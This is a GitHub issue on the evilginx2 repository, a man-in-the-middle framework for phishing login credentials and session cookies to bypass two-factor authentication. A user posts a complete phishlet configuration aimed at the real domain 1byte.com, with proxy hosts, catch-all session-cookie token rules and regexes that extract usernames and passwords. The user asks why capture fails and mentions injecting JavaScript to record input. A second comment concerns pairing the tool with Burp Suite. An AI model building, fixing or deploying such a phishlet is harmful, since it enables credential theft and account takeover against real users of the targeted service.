kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License

Evilginx ver 3.3.0 cannot capture credentials #1109

Open alasalamont opened 2 weeks ago

alasalamont commented 2 weeks ago

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Hi all, I am using Evilginx 3.3.0 and testing against the domain 1byte.com, but I cannot catch the credentials.

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['.*:regexp']
  - domain: '1byte.com'
    keys: ['.*:regexp']  
  - domain: '.api.1byte.com'
    keys: ['.*:regexp']
  - domain: 'api.1byte.com'
    keys: ['.*:regexp']
auth_urls:
  - '/'
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'

Another option is to inject JavaScript to capture what the user inputs, but that's not what I'm aiming for. I just want to know if the way I've built the phishlet is correct or not. If it's wrong, where exactly is the issue? Or are there certain cases where Evilginx can't capture credentials without injecting JavaScript?

Thanks!!!

iliwasel commented 1 day ago

I am trying to reproduce your issue, but how did you manage to get Evilginx and Burp Suite to work together? I get: Cannot read TLS response from mitm'd server proxyconnect tcp: EOF